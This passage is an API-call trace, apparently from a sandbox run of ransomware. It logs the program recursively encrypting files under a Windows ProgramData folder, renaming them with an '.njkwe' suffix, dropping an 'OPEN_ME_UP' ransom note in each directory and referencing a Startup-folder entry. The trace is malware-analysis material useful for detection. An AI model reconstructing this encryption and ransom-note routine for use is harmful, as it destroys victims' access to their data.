(lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.162] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.162] GetTickCount () returned 0x1153620 [0076.162] GetTickCount () returned 0x1153620 [0076.162] GetTickCount () returned 0x1153620 [0076.162] GetTickCount () returned 0x1153620 [0076.162] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.162] GetProcessHeap () returned 0xbe0000 [0076.162] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.162] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x710, lpOverlapped=0x0) returned 1 [0076.164] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff8f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.164] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x710, lpOverlapped=0x0) returned 1 [0076.164] GetProcessHeap () returned 0xbe0000 [0076.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.164] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.164] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.164] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.165] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.165] CloseHandle (hObject=0x43c) returned 1 [0076.165] GetProcessHeap () returned 0xbe0000 [0076.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.165] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0076.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.165] GetProcessHeap () returned 0xbe0000 [0076.165] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.165] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f1ea40, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f1ea40, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f44caa, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="0__POW~1.PRO")) returned 0 [0076.165] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0076.165] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0076.165] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.166] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0076.167] CloseHandle (hObject=0x438) returned 1 [0076.167] GetProcessHeap () returned 0xbe0000 [0076.167] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.167] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f44caa, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f44caa, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f44caa, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0076.167] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0076.167] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0076.167] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0076.167] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0076.167] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0076.167] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml") returned 97 [0076.167] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0076.167] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.167] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0076.167] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.167] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.167] GetTickCount () returned 0x1153620 [0076.167] GetTickCount () returned 0x1153620 [0076.167] GetTickCount () returned 0x1153620 [0076.167] GetTickCount () returned 0x1153620 [0076.167] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0076.168] GetProcessHeap () returned 0xbe0000 [0076.168] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.168] ReadFile (in: hFile=0x438, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f04c*=0xfb, lpOverlapped=0x0) returned 1 [0076.169] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.169] WriteFile (in: hFile=0x438, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f04c*=0xfb, lpOverlapped=0x0) returned 1 [0076.169] GetProcessHeap () returned 0xbe0000 [0076.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.169] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.169] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0076.170] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0076.170] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0076.170] CloseHandle (hObject=0x438) returned 1 [0076.170] GetProcessHeap () returned 0xbe0000 [0076.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.170] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0076.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.172] GetProcessHeap () returned 0xbe0000 [0076.172] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.172] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f44caa, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f44caa, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f44caa, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xfb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0076.172] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0076.172] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0076.172] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.173] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0076.174] CloseHandle (hObject=0x434) returned 1 [0076.174] GetProcessHeap () returned 0xbe0000 [0076.174] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.174] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0076.174] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0076.174] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0076.174] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.175] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0076.176] CloseHandle (hObject=0x430) returned 1 [0076.176] GetProcessHeap () returned 0xbe0000 [0076.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0076.176] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", cAlternateFileName="{B0B91~1")) returned 1 [0076.176] lstrcmpiW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="Windows") returned -1 [0076.176] lstrcmpiW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="$Recycle.bin") returned 1 [0076.176] lstrcmpiW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="System Volume Information") returned -1 [0076.176] lstrcmpiW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="Program Files") returned -1 [0076.176] lstrcmpiW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="Program Files (x86)") returned -1 [0076.176] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned 80 [0076.176] lstrcmpW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2=".") returned 1 [0076.176] lstrcmpW (lpString1="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="..") returned 1 [0076.176] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.176] GetProcessHeap () returned 0xbe0000 [0076.176] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0076.176] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*") returned 82 [0076.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19de0 [0076.177] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.177] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.177] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\.") returned 82 [0076.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.177] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.177] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\..") returned 83 [0076.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.177] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fb24d6, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fb24d6, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fb24d6, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x8b5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0076.177] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0076.177] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0076.177] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0076.177] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0076.177] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0076.177] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned 99 [0076.177] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0076.177] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.177] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0076.177] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.178] GetTickCount () returned 0x115362f [0076.178] GetTickCount () returned 0x115362f [0076.178] GetTickCount () returned 0x115362f [0076.178] GetTickCount () returned 0x115362f [0076.178] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.178] GetProcessHeap () returned 0xbe0000 [0076.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.178] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x8b5, lpOverlapped=0x0) returned 1 [0076.180] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff74b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.180] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x8b5, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x8b5, lpOverlapped=0x0) returned 1 [0076.180] GetProcessHeap () returned 0xbe0000 [0076.180] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.180] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.180] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.180] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.180] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.180] CloseHandle (hObject=0x434) returned 1 [0076.180] GetProcessHeap () returned 0xbe0000 [0076.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.180] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0076.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml_r00t_{3sXlE5}.njkwe" 